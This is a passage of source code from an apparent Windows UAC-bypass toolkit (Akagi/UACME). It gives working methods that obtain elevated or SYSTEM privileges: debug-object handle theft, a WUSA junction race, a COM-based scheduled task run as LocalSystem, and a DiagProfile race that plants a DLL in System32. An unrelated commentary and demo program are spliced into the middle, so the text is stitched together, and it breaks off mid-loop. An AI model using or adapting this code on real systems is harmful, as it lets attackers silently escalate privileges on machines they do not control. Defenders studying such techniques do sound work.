lpszPayload ) { //UINT retryCount = 0; BOOL debugObjectSet = FALSE; NTSTATUS status = STATUS_ACCESS_DENIED; HANDLE dbgHandle = NULL, dbgProcessHandle = NULL, dupHandle = NULL; PROCESS_INFORMATION procInfo; DEBUG_EVENT dbgEvent; WCHAR szProcess[MAX_PATH * 2]; do { // // Spawn initial non elevated victim process under debug. 
// //do { /* remove comment for attempt to spam debug object within thread pool */ _strcpy(szProcess, g_ctx->szSystemDirectory); _strcat(szProcess, WINVER_EXE); if (!AicLaunchAdminProcess(szProcess, szProcess, 0, CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS, g_ctx->szSystemRoot, T_DEFAULT_DESKTOP, NULL, INFINITE, SW_HIDE, &procInfo)) { status = STATUS_UNSUCCESSFUL; break; } // // Capture debug object handle. // status = supGetProcessDebugObject(procInfo.hProcess, &dbgHandle); if (!NT_SUCCESS(status)) { TerminateProcess(procInfo.hProcess, 0); CloseHandle(procInfo.hThread); CloseHandle(procInfo.hProcess); procInfo.hThread = NULL; procInfo.hProcess = NULL; break; } // // Detach debug and kill non elevated victim process. // NtRemoveProcessDebug(procInfo.hProcess, dbgHandle); TerminateProcess(procInfo.hProcess, 0); CloseHandle(procInfo.hThread); CloseHandle(procInfo.hProcess); //} while (++retryCount < 20); // // Spawn elevated victim under debug. // _strcpy(szProcess, g_ctx->szSystemDirectory); _strcat(szProcess, COMPUTERDEFAULTS_EXE); RtlSecureZeroMemory(&procInfo, sizeof(procInfo)); RtlSecureZeroMemory(&dbgEvent, sizeof(dbgEvent)); if (!AicLaunchAdminProcess(szProcess, szProcess, 1, CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS, g_ctx->szSystemRoot, T_DEFAULT_DESKTOP, NULL, INFINITE, SW_HIDE, &procInfo)) { status = STATUS_UNSUCCESSFUL; break; } // // Update thread TEB with debug object handle to receive debug events. // DbgUiSetThreadDebugObject(dbgHandle); debugObjectSet = TRUE; // // Debugger wait cycle. // while (1) { if (!WaitForDebugEvent(&dbgEvent, INFINITE)) break; switch (dbgEvent.dwDebugEventCode) { // // Capture initial debug event process handle. // case CREATE_PROCESS_DEBUG_EVENT: dbgProcessHandle = dbgEvent.u.CreateProcessInfo.hProcess; break; } if (dbgProcessHandle) break; ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId, DBG_CONTINUE); } if (dbgProcessHandle) { // // Create new handle from captured with PROCESS_ALL_ACCESS. 
// status = NtDuplicateObject(dbgProcessHandle, NtCurrentProcess(), NtCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, 0, 0); if (NT_SUCCESS(status)) { // // Run new process with parent set to duplicated process handle. // ucmxCreateProcessFromParent(dupHandle, lpszPayload); NtClose(dupHandle); dupHandle = NULL; } } } while (FALSE); // // Cleanup section. // if (debugObjectSet) { #pragma warning(push) #pragma warning(disable: 6387) DbgUiSetThreadDebugObject(NULL); #pragma warning(pop) } if (dbgHandle) { NtClose(dbgHandle); } if (dbgProcessHandle) { CloseHandle(dbgProcessHandle); } // Release victim process if still open if (procInfo.hThread) { CloseHandle(procInfo.hThread); } if (procInfo.hProcess) { TerminateProcess(procInfo.hProcess, 0); CloseHandle(procInfo.hProcess); } supSetGlobalCompletionEvent(); return status; } ================================================ FILE: Source/Akagi/methods/wusa.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2017 - 2025 * * TITLE: WUSA.C * * VERSION: 3.69 * * DATE: 07 Jul 2025 * * Windows Update Standalone Installer (WUSA) based routines. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" #include "makecab.h" /* * ucmCreateCabinetForSingleFile * * Purpose: * * Build cabinet for usage in methods where required 1 file. 
* */ BOOL ucmCreateCabinetForSingleFile( _In_ LPWSTR lpSourceDll, _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize, _In_opt_ LPWSTR lpInternalName ) { BOOL bResult = FALSE; CABDATA *Cabinet = NULL; LPWSTR lpFileName; WCHAR szMsuFileName[MAX_PATH * 2]; if ((ProxyDll == NULL) || (ProxyDllSize == 0) || (lpSourceDll == NULL)) return bResult; do { //drop proxy dll if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) { break; } //build cabinet RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName)); _strcpy(szMsuFileName, g_ctx->szTempDirectory); _strcat(szMsuFileName, ELLOCNAK_MSU); Cabinet = cabCreate(szMsuFileName); if (Cabinet == NULL) break; if (lpInternalName == NULL) { lpFileName = _filename(lpSourceDll); } else { lpFileName = lpInternalName; } //put file without compression bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName); cabClose(Cabinet); } while (FALSE); DeleteFile(lpSourceDll); return bResult; } /* * ucmWusaCabinetCleanup * * Purpose: * * Remove fake msu file. * */ VOID ucmWusaCabinetCleanup( VOID) { WCHAR szMsuFileName[MAX_PATH * 2]; RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName)); _strcpy(szMsuFileName, g_ctx->szTempDirectory); _strcat(szMsuFileName, ELLOCNAK_MSU); DeleteFile(szMsuFileName); } volatile ULONG g_ThreadFinished = 0; /* * ucmxInvokeWusaThread * * Purpose: * * Start wusa and wait a bit. 
* */ DWORD ucmxInvokeWusaThread( PVOID Param) { SHELLEXECUTEINFO shinfo; WCHAR szProcess[MAX_PATH * 2]; WCHAR szParameters[MAX_PATH * 3]; UNREFERENCED_PARAMETER(Param); InterlockedExchange((LONG*)&g_ThreadFinished, 0); RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); _strcpy(szProcess, g_ctx->szSystemDirectory); _strcat(szProcess, WUSA_EXE); RtlSecureZeroMemory(szParameters, sizeof(szParameters)); _strcpy(szParameters, TEXT(" /quiet ")); _strcat(szParameters, g_ctx->szTempDirectory); _strcat(szParameters, ELLOCNAK_MSU); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI; shinfo.lpFile = szProcess; shinfo.lpParameters = szParameters; shinfo.nShow = SW_HIDE; if (ShellExecuteEx(&shinfo)) { if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT) TerminateProcess(shinfo.hProcess, 0); CloseHandle(shinfo.hProcess); } Sleep(2000); InterlockedExchange((LONG*)&g_ThreadFinished, 1); return 0; } /* * ucmxDirectoryWatchdogThread * * Purpose: * * Monitor directory creation in system root directory. * When it happened - set reparse point. * */ DWORD ucmxDirectoryWatchdogThread( PVOID Param) { BOOL bResult = FALSE; NTSTATUS status; HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL; IO_STATUS_BLOCK IoStatusBlock; OBJECT_ATTRIBUTES ObjectAttributes; LPWSTR lpTargetDirectory = (LPWSTR)Param; PVOID Buffer = NULL; SIZE_T memIO = 0; FILE_NOTIFY_INFORMATION *pInfo = NULL; LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL; WCHAR szBuffer[MAX_PATH * 2]; UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory; do { // // Convert target directory path to native form. // usTargetDirectory.Buffer = NULL; if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL)) break; // // Convert watch directory path to native form. 
// RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); szBuffer[0] = L'\\'; szBuffer[1] = L'?'; szBuffer[2] = L'?'; szBuffer[3] = L'\\'; _strncpy(&szBuffer[4], MAX_PATH, g_ctx->szSystemDirectory, 3); // // Open directory for change notification. // RtlInitUnicodeString(&usWatchDirectory, szBuffer); InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL); status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE, &ObjectAttributes, &IoStatusBlock, NULL, FILE_OPEN_FOR_BACKUP_INTENT, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); if (!NT_SUCCESS(status)) break; memIO = 1024 * 1024; Buffer = supHeapAlloc(memIO); if (Buffer == NULL) break; InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL); status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE); if (!NT_SUCCESS(status)) break; // // Watch for directory changes. // do { status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL, &IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE); if (status == STATUS_PENDING) NtWaitForSingleObject(hEvent, TRUE, NULL); NtSetEvent(hEvent, NULL); pInfo = (FILE_NOTIFY_INFORMATION*)Buffer; for (;;) { if (pInfo->Action == FILE_ACTION_ADDED) { memIO = pInfo->FileNameLength + ((1 + _strlen(szBuffer)) * sizeof(WCHAR)); CapturedDirectoryName = (LPWSTR)supHeapAlloc(memIO); if (CapturedDirectoryName) { _strcpy(CapturedDirectoryName, szBuffer); lpEnd = _strend(CapturedDirectoryName); RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength); // // Open new directory to set reparse point. 
// RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName); InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL); status = NtCreateFile(&hReparseDirectory, FILE_ALL_ACCESS, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); if (NT_SUCCESS(status)) { // // Set reparse point. // bResult = supSetMountPoint(hReparseDirectory, usTargetDirectory.Buffer, lpTargetDirectory); } status = STATUS_NO_SECRETS; } } //Action if (status == STATUS_NO_SECRETS) break; pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset); if (pInfo->NextEntryOffset == 0) break; } } while (NT_SUCCESS(status)); } while (FALSE); // // Cleanup. // if (hEvent) NtClose(hEvent); if (hDirectory != NULL) NtClose(hDirectory); if (usTargetDirectory.Buffer) RtlFreeUnicodeString(&usTargetDirectory); if (Buffer != NULL) supHeapFree(Buffer); // // Remove reparse point. // if (CapturedDirectoryName) { while (g_ThreadFinished != 1) Sleep(100); if (hReparseDirectory) { supDeleteMountPoint(hReparseDirectory); NtClose(hReparseDirectory); } RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName); InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL); NtDeleteFile(&ObjectAttributes); supHeapFree(CapturedDirectoryName); } return (DWORD)bResult; } /* * ucmWusaExtractViaJunction * * Purpose: * * Extract cab contents to the specified directory by initializing wusa race condition. * This routine expect source as ellocnak.msu cab file in the %temp% folder. * */ BOOL ucmWusaExtractViaJunction( _In_ LPWSTR lpTargetDirectory ) { HANDLE hWatchdogThread, hWusaThread; DWORD ti; do { // // Run watchdog thread. 
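The watchdog above reacts to FILE_NOTIFY_INFORMATION records returned by NtNotifyChangeDirectoryFile. Note that its record walk advances to the next record and only then tests NextEntryOffset, so when one completion carries several records the last one is never examined (the outer loop simply re-arms the watch). The following is an added example, my own code rather than anything from UACME: a portable walk over such a buffer that tests the current record before advancing and bounds-checks every record. The record layout is spelled out with fixed-width types so it compiles off Windows; the directory names are constructed for the example, and the reparse-point step is Windows-only and not reproduced here. The `\??\C:\` prefix in the demo mirrors how the watchdog builds CapturedDirectoryName.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Record layout NtNotifyChangeDirectoryFile writes (FILE_NOTIFY_INFORMATION), in
 * fixed-width types so this compiles anywhere:
 *   uint32_t NextEntryOffset;  bytes from this record to the next, 0 on the last
 *   uint32_t Action;           1 = FILE_ACTION_ADDED, 2 = FILE_ACTION_REMOVED, ...
 *   uint32_t FileNameLength;   byte length of FileName (UTF-16, no terminator)
 *   uint16_t FileName[];       name relative to the watched directory
 */
enum { FILE_ACTION_ADDED = 1, FILE_ACTION_REMOVED = 2 };
enum { NOTIFY_HDR = 12, NAME_MAX_CHARS = 64 };

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Walk every record and collect, as ASCII, the names of newly created entries.
 * NextEntryOffset is tested on the record just handled, before advancing, so the
 * last record of a multi-record buffer is examined as well. Every record is
 * bounds-checked against the completion length. */
size_t collect_added(const uint8_t *buf, size_t len, char out[][NAME_MAX_CHARS], size_t max_out)
{
    size_t count = 0, off = 0;
    while (off + NOTIFY_HDR <= len) {
        uint32_t next   = rd32(buf + off);
        uint32_t action = rd32(buf + off + 4);
        uint32_t nbytes = rd32(buf + off + 8);
        if (off + NOTIFY_HDR + nbytes > len) break;        /* truncated record */
        if (action == FILE_ACTION_ADDED && count < max_out) {
            size_t n = nbytes / 2;
            if (n >= NAME_MAX_CHARS) n = NAME_MAX_CHARS - 1;
            for (size_t i = 0; i < n; i++) {
                const uint8_t *c = buf + off + NOTIFY_HDR + 2 * i;
                uint16_t wc = (uint16_t)(c[0] | (c[1] << 8));
                out[count][i] = wc < 0x80 ? (char)wc : '?';
            }
            out[count][n] = '\0';
            count++;
        }
        if (next == 0 || next < NOTIFY_HDR) break;          /* last record, or malformed */
        off += next;
    }
    return count;
}

/* Writes one record at buf+off, 4-byte aligned like the kernel does; returns bytes used. */
static size_t put_record(uint8_t *buf, size_t off, uint32_t action, const char *name, int last)
{
    size_t n = strlen(name);
    size_t padded = (NOTIFY_HDR + 2 * n + 3) & ~(size_t)3;
    uint32_t next = last ? 0 : (uint32_t)padded, nbytes = (uint32_t)(2 * n);
    memcpy(buf + off, &next, 4);
    memcpy(buf + off + 4, &action, 4);
    memcpy(buf + off + 8, &nbytes, 4);
    for (size_t i = 0; i < n; i++) {                        /* ASCII -> UTF-16LE */
        buf[off + NOTIFY_HDR + 2 * i] = (uint8_t)name[i];
        buf[off + NOTIFY_HDR + 2 * i + 1] = 0;
    }
    return padded;
}

static char g_added[4][NAME_MAX_CHARS];

/* Constructed sample: three records as a watcher on the drive root might receive
 * them in a single completion. The directory names are made up for the example. */
size_t demo_added_count(void)
{
    uint8_t buf[256] = {0};
    size_t off = 0;
    off += put_record(buf, off, FILE_ACTION_ADDED,   "SampleDirA", 0);
    off += put_record(buf, off, FILE_ACTION_REMOVED, "OldDir",     0);
    off += put_record(buf, off, FILE_ACTION_ADDED,   "SampleDirB", 1);
    return collect_added(buf, off, g_added, 4);
}

const char *demo_added_name(size_t i) { return g_added[i]; }

int main(void)
{
    size_t n = demo_added_count();
    for (size_t i = 0; i < n; i++)      /* \??\C:\ prefix as the watchdog builds it */
        printf("created: \\??\\C:\\%s\n", demo_added_name(i));
    return 0;
}
```

With the page's loop the sample would yield only SampleDirA; the walk here yields both created directories, which matters for a watcher that has to react to the first directory the elevated process creates, whichever position it lands in.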
// hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti); if (hWatchdogThread == NULL) break; // // Run wusa in separate thread. // hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti); if (hWusaThread) { if (WaitForSingleObject(hWusaThread, 15000) == WAIT_TIMEOUT) TerminateThread(hWusaThread, 0); CloseHandle(hWusaThread); } if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT) TerminateThread(hWatchdogThread, 0); CloseHandle(hWatchdogThread); } while (FALSE); return (g_ThreadFinished == 1); } ================================================ FILE: Source/Akagi/methods/zcgonvh.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2020 - 2025 * * TITLE: ZCGONVH.C * * VERSION: 3.69 * * DATE: 12 Dec 2025 * * UAC bypass methods based on zcgonvh original work. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #include "global.h" #include "encresource.h" HRESULT ucmxGetElevatedFactoryServerObject( _In_ LPCWSTR Clsid, _Out_ VOID** FactoryServer ) { HRESULT r; IElevatedFactoryServer* pElevatedServer = NULL; *FactoryServer = NULL; r = ucmAllocateElevatedObject(Clsid, &IID_ElevatedFactoryServer, CLSCTX_LOCAL_SERVER, (VOID**)&pElevatedServer); if (FAILED(r)) return r; if (pElevatedServer == NULL) { return E_OUTOFMEMORY; } *FactoryServer = pElevatedServer; return S_OK; } BOOL ucmxGetElevatedFactoryServerAndTaskService( _Out_ IElevatedFactoryServer** FactoryServer, _Out_ ITaskService** TaskService ) { IElevatedFactoryServer* pElevatedServer = NULL; ITaskService* pService = NULL; HRESULT r; *TaskService = NULL; *FactoryServer = NULL; do { r = ucmxGetElevatedFactoryServerObject(T_CLSID_VFServer, (VOID**)&pElevatedServer); if (r != S_OK) break; if (pElevatedServer == NULL) { r = E_OUTOFMEMORY; break; } r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer, &CLSID_TaskScheduler, &IID_ITaskService, (void**)&pService); if (r != S_OK) { break; } if (pService == NULL) { r = E_OUTOFMEMORY; break; } *FactoryServer = pElevatedServer; *TaskService = pService; } while (FALSE); if (FAILED(r)) { if (pElevatedServer) { pElevatedServer->lpVtbl->Release(pElevatedServer); pElevatedServer = NULL; } } return SUCCEEDED(r); } BOOL ucmxRegisterAndRunTask( _In_ ITaskService* TaskService, _In_ BSTR RegistrationData ) { HRESULT r = E_FAIL; VARIANT varDummy; ITaskFolder* pTaskFolder = NULL; IRegisteredTask* pTask = NULL; IRunningTask* pRunningTask = NULL; TASK_STATE taskState = TASK_STATE_UNKNOWN; BSTR bstrTaskFolder = NULL, bstrTaskName = NULL; do { bstrTaskFolder = SysAllocString(L"\\"); if (bstrTaskFolder == NULL) break; bstrTaskName = SysAllocString(THEOLDNEWTHING); if (bstrTaskName == NULL) break; VariantInit(&varDummy); r = TaskService->lpVtbl->Connect(TaskService, varDummy, varDummy, varDummy, 
varDummy); if (FAILED(r)) break; r = TaskService->lpVtbl->GetFolder(TaskService, bstrTaskFolder, &pTaskFolder); if (r != S_OK || pTaskFolder == NULL) break; r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0, varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask); if (r == HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS)) { r = pTaskFolder->lpVtbl->GetTask(pTaskFolder, bstrTaskName, &pTask); if (SUCCEEDED(r)) { pTask->lpVtbl->Stop(pTask, 0); pTask->lpVtbl->Release(pTask); pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0); } r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0, varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask); } if (r != S_OK || pTask == NULL) break; r = pTask->lpVtbl->Run(pTask, varDummy, &pRunningTask); if (r != S_OK || pRunningTask == NULL) break; if (SUCCEEDED(pRunningTask->lpVtbl->get_State(pRunningTask, &taskState))) { if (taskState == TASK_STATE_RUNNING) { Sleep(5000); } } pRunningTask->lpVtbl->Stop(pRunningTask); pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0); } while (FALSE); if (bstrTaskFolder) SysFreeString(bstrTaskFolder); if (bstrTaskName) SysFreeString(bstrTaskName); if (pRunningTask) pRunningTask->lpVtbl->Release(pRunningTask); if (pTask) pTask->lpVtbl->Release(pTask); if (pTaskFolder) pTaskFolder->lpVtbl->Release(pTaskFolder); return SUCCEEDED(r); } BSTR ucmxBuildParametersForTask( _In_ LPCWSTR lpLoader, _In_ SIZE_T cbLoader ) { BSTR bstrResult = NULL; SIZE_T sz; PVOID workBuffer, offsetPtr; sz = cbLoader + sizeof(g_encodedTaskParamBegin) + sizeof(g_encodedTaskParamEnd); workBuffer = (PWCH)supHeapAlloc(sz); if (workBuffer) { offsetPtr = workBuffer; RtlCopyMemory(offsetPtr, g_encodedTaskParamBegin, sizeof(g_encodedTaskParamBegin)); EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamBegin), AKAGI_XOR_KEY2); offsetPtr = RtlOffsetToPointer(offsetPtr, sizeof(g_encodedTaskParamBegin)); RtlCopyMemory(offsetPtr, lpLoader, 
cbLoader); offsetPtr = RtlOffsetToPointer(offsetPtr, cbLoader); RtlCopyMemory(offsetPtr, g_encodedTaskParamEnd, sizeof(g_encodedTaskParamEnd)); EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamEnd), AKAGI_XOR_KEY2); bstrResult = SysAllocString(workBuffer); supHeapFree(workBuffer); } return bstrResult; } /* * ucmVFServerTaskSchedMethod * * Purpose: * * Bypass UAC by using Elevated Factory Server COM object. * * 1. Allocate Elevated Factory Server COM object and produce with it help Task Scheduler object. * 2. Use Task Scheduler object to register task running as LocalSystem. * */ NTSTATUS ucmVFServerTaskSchedMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { BOOL bNeedCleanup = FALSE; NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HRESULT hr_init; IElevatedFactoryServer* pElevatedServer = NULL; ITaskService* pTaskService = NULL; BSTR bstrXml = NULL; WCHAR szLoaderFileName[MAX_PATH * 2]; ucmConsolePrint(TEXT("[+] Entering ucmVFServerTaskSchedMethod\r\n")); hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { // // Write loader to the %temp% // if (!supReplaceDllEntryPoint( ProxyDll, ProxyDllSize, AKATSUKI_ENTRYPOINT_EXE, TRUE)) { break; } RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName)); _strcpy(szLoaderFileName, g_ctx->szTempDirectory); _strcat(szLoaderFileName, THEOLDNEWTHING); _strcat(szLoaderFileName, TEXT(".exe")); bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize); if (!bNeedCleanup) break; bstrXml = ucmxBuildParametersForTask(szLoaderFileName, _strlen(szLoaderFileName) * sizeof(WCHAR)); if (bstrXml == NULL) break; if (!ucmxGetElevatedFactoryServerAndTaskService(&pElevatedServer, &pTaskService)) break; if (ucmxRegisterAndRunTask(pTaskService, bstrXml)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (bstrXml) SysFreeString(bstrXml); if (pElevatedServer != NULL) { pElevatedServer->lpVtbl->Release(pElevatedServer); } if (pTaskService) { pTaskService->lpVtbl->Release(pTaskService); } if 
(SUCCEEDED(hr_init))
        CoUninitialize();

    if (bNeedCleanup)
        DeleteFile(szLoaderFileName);

    return MethodResult;
}

typedef struct _UCMX_OVP {
    PVOID ProxyDll;
    DWORD ProxyDllSize;
    WCHAR TargetFile[MAX_PATH * 2]; //%temp%\hui32\results.cab
} UCMX_OVP, * PUCMX_OVP;

HANDLE OverwriteThreadHandle = NULL;
LONG TerminateOverwriteThread = FALSE;

/*
* ucmxOverwriteThread
*
* Purpose:
*
* Thread for race condition, continuously overwrite diagprofile results.cab file with the payload.
*
*/
DWORD ucmxOverwriteThread(
    _In_ PVOID Parameter)
{
    UCMX_OVP params;
    HANDLE hTargetFile;
    DWORD bytesIO;

    RtlCopyMemory(&params, Parameter, sizeof(UCMX_OVP));

    while (TRUE) {

        if (TerminateOverwriteThread) {
            break;
        }

        hTargetFile = CreateFile(params.TargetFile,
            GENERIC_WRITE,
            FILE_SHARE_VALID_FLAGS,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);

        if (hTargetFile != INVALID_HANDLE_VALUE) {
            WriteFile(hTargetFile, params.ProxyDll, params.ProxyDllSize, &bytesIO, NULL);
            CloseHandle(hTargetFile);
        }
    }

    supHeapFree(Parameter);
    CloseHandle(OverwriteThreadHandle);
    OverwriteThreadHandle = NULL;
    return 0;
}

/*
* ucmxTriggerDiagProfile
*
* Purpose:
*
* Allocate elevated diag profile object and call SaveDirectoryAsCab method.
* */ HRESULT ucmxTriggerDiagProfile( _In_ LPCWSTR lpDirectory ) { HRESULT r = E_FAIL; IElevatedFactoryServer* pElevatedServer = NULL; IUnknown* pUnknown = NULL; IDispatch* pDispatch = NULL; CLSID clsid; DISPID dispid; DISPPARAMS dispatchParams; LPOLESTR methodName = NULL; VARIANT result; VARIANTARG values[2]; WCHAR szTarget[MAX_PATH * 2]; values[0].bstrVal = NULL; values[1].bstrVal = NULL; do { methodName = SysAllocString(L"SaveDirectoryAsCab"); if (methodName == NULL) break; r = ucmxGetElevatedFactoryServerObject( T_CLSID_VFServerDiagCpl, (VOID**)&pElevatedServer); if (r != S_OK) break; ucmConsolePrint(TEXT("[+] Elevated Factory Server object allocated\r\n")); r = CLSIDFromString(T_CLSID_DiagnosticProfile, &clsid); if (r != S_OK) break; r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer, &clsid, &IID_IUnknown, (void**)&pUnknown); if (r != S_OK) break; ucmConsolePrint(TEXT("[+] Elevated DiagProfile object allocated\r\n")); if (pUnknown == NULL) { r = E_FAIL; break; } r = pUnknown->lpVtbl->QueryInterface(pUnknown, &IID_IDispatch, (VOID**)&pDispatch); if (r != S_OK) break; ucmConsolePrint(TEXT("[+] QueryInterface success\r\n")); if (pDispatch == NULL) { r = E_FAIL; break; } r = pDispatch->lpVtbl->GetIDsOfNames(pDispatch, &IID_NULL, &methodName, 1, LOCALE_USER_DEFAULT, &dispid); if (r != S_OK) break; ucmConsolePrint(TEXT("[+] Dispatch->GetIDsOfNames success\r\n")); RtlSecureZeroMemory(&dispatchParams, sizeof(dispatchParams)); VariantInit(&values[0]); VariantInit(&values[1]); _strcpy(szTarget, g_ctx->szSystemDirectory); _strcat(szTarget, WOW64LOG_DLL); values[0].vt = VT_BSTR; values[0].bstrVal = SysAllocString(szTarget); if (values[0].bstrVal == NULL) { r = E_OUTOFMEMORY; break; } values[1].vt = VT_BSTR; values[1].bstrVal = SysAllocString(lpDirectory); if (values[1].bstrVal == NULL) { r = E_OUTOFMEMORY; break; } dispatchParams.cArgs = 2; dispatchParams.rgvarg = values; VariantInit(&result); r = pDispatch->lpVtbl->Invoke(pDispatch, dispid, 
&IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, &dispatchParams, &result, NULL, NULL); ucmConsolePrintValueUlong(TEXT("[+] Dispatch->Invoke"), r, TRUE); VariantClear(&result); } while (FALSE); if (values[0].bstrVal) SysFreeString(values[0].bstrVal); if (values[1].bstrVal) SysFreeString(values[1].bstrVal); if (methodName) SysFreeString((BSTR)methodName); if (pDispatch) { pDispatch->lpVtbl->Release(pDispatch); } if (pUnknown) { pUnknown->lpVtbl->Release(pUnknown); } if (pElevatedServer != NULL) { pElevatedServer->lpVtbl->Release(pElevatedServer); } return r; } /* * ucmVFServerDiagProfileMethod * * Purpose: * * Bypass UAC by using Elevated Factory Server COM object. * * 1. Allocate Elevated Factory Server COM object and produce with it help Diag Profiler object. * 2. Use Diag Profiler object to move files into protected area via race condition. * */ NTSTATUS ucmVFServerDiagProfileMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; HRESULT hr_init, r; DWORD dwLastError; ULONG retryCount = 0; UCMX_OVP* ovParams = NULL; WCHAR szBuffer[MAX_PATH * 2]; ucmConsolePrint(TEXT("[+] Entering ucmVFServerDiagProfileMethod\r\n")); hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { // // Create %temp%\hui32 directory. // _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, THEOLDNEWTHING); if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) { dwLastError = GetLastError(); if (dwLastError != ERROR_ALREADY_EXISTS) { ucmConsolePrintValueUlong(TEXT("[!] 
Could not create directory\r\n"), dwLastError, TRUE); break; } } ovParams = (UCMX_OVP*)supHeapAlloc(sizeof(UCMX_OVP)); if (ovParams == NULL) break; ovParams->ProxyDll = ProxyDll; ovParams->ProxyDllSize = ProxyDllSize; _strcpy(ovParams->TargetFile, szBuffer); supPathAddBackSlash(ovParams->TargetFile); _strcat(ovParams->TargetFile, TEXT("results.cab")); OverwriteThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxOverwriteThread, (PVOID)ovParams, 0, NULL); if (OverwriteThreadHandle == NULL) { ucmConsolePrintValueUlong(TEXT("[!] Cannot create worker thread\r\n"), GetLastError(), TRUE); supHeapFree(ovParams); break; } SetThreadPriority(OverwriteThreadHandle, THREAD_PRIORITY_TIME_CRITICAL); r = ucmxTriggerDiagProfile(szBuffer); if (FAILED(r)) { ucmConsolePrintValueUlong(TEXT("[!] DiagProfile does not trigger\r\n"), r, TRUE); break; } _InterlockedExchange((LONG*)&TerminateOverwriteThread, TRUE); _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, WOW64LOG_DLL); do { if (PathFileExists(szBuffer)) { ucmConsolePrint(TEXT("[+] Payload file installed\r\n")); break; } else Sleep(1000); 